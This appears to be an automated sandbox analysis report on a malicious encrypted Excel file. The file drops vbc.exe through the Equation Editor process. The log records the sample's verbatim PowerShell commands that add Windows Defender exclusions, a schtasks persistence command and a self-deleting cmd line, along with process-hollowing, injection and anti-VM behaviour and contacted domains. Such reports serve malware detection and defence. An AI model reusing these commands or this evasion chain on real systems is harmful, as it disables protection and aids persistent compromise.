          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp4D08.tmp'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: dows\System.Management.Automation.pdbpdbion.pdbn\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbExplorer.Default -extoff source: powershell.exe, 00000005.00000002.2148838575.0000000000614000.00000004.00000020.sdmp
          Source: Binary string: System.Management.Automation.pdb:Z source: powershell.exe, 00000007.00000002.2161752463.000000000630D000.00000004.00000001.sdmp
          Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb< source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, cmmon32.exe
          Source: Binary string: System.Management.Automation.pdb' source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\System.Management.Automation.pdb] source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2153198993.0000000002970000.00000002.00000001.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Refno.191938.xlsx | Initial sample: OLE indicators vbamacros = False
          Source: Refno.191938.xlsx | Initial sample: OLE indicators encrypted = True
          Source: ohms[1].exe.2.dr | Static PE information: 0xDA32965F [Tue Jan 1 18:33:03 2086 UTC]
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00321F81 pushfd ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_027711A3 push 8DC2110Fh; retn 568Dh
          Source: C:\Users\Public\vbc.exe | Code function: 13_2_0041D0D2 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 13_2_0041D0DB push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 13_2_0041D085 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 13_2_0041D13C push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 13_2_0041D9B9 push ss; ret
          Source: C:\Users\Public\vbc.exe | Code function: 13_2_0040E29B pushfd ; retf
          Source: C:\Users\Public\vbc.exe | Code function: 13_2_00404443 push cs; ret
          Source: C:\Users\Public\vbc.exe | Code function: 13_2_0041E586 push esp; ret
          Source: C:\Users\Public\vbc.exe | Code function: 13_2_00C7DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 15_2_01FBDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 15_2_000DD085 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 15_2_000DD0DB push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 15_2_000DD0D2 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 15_2_000DD13C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 15_2_000CE29B pushfd ; retf
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 15_2_000C4443 push cs; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 15_2_000DE586 push esp; ret
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 15_2_000DD9B9 push ss; ret
          Source: initial sample | Static PE information: section name: .text entropy: 7.5188778941
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ohms[1].exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp4D08.tmp'

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xEA
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Refno.191938.xlsx | Stream path 'EncryptedPackage' entropy: 7.99921088827 (max. 8.0)

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2824, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 00000000000C98E4 second address: 00000000000C98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 00000000000C9B5E second address: 00000000000C9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | Code function: 13_2_00409A90 rdtsc
          Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2540 | Thread sleep time: -300000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2776 | Thread sleep time: -101794s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2476 | Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2904 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2356 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2892 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1544 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 884 | Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 1552 | Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_01E2096A GetSystemInfo,
          Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 101794
          Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: powershell.exe, 00000007.00000003.2140373005.00000000002B1000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2154125481.000000000255C000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00409A90 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 13_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C826F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FA00EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FA0080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FC26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 43.226.23.112 80
          Source: C:\Windows\explorer.exe | Domain query: www.pistonpounder.com
          Source: C:\Windows\explorer.exe | Domain query: www.20svip.com
          .NET source code references suspicious native API functions
          Source: ohms[1].exe.2.dr, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: ohms[1].exe.2.dr, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: zFVxYeAVOjnwuB.exe.4.dr, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: zFVxYeAVOjnwuB.exe.4.dr, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 4.2.vbc.exe.a00000.3.unpack, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 4.2.vbc.exe.a00000.3.unpack, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 4.0.vbc.exe.a00000.0.unpack, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 4.0.vbc.exe.a00000.0.unpack, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Source: 13.0.vbc.exe.a00000.0.unpack, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
          Source: 13.0.vbc.exe.a00000.0.unpack, ProcessClass.cs | Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Injects a PE file into a foreign process
          Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
          Source: C:\Windows\SysWOW64\cmmon32.exe | Thread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 340000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp4D08.tmp'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
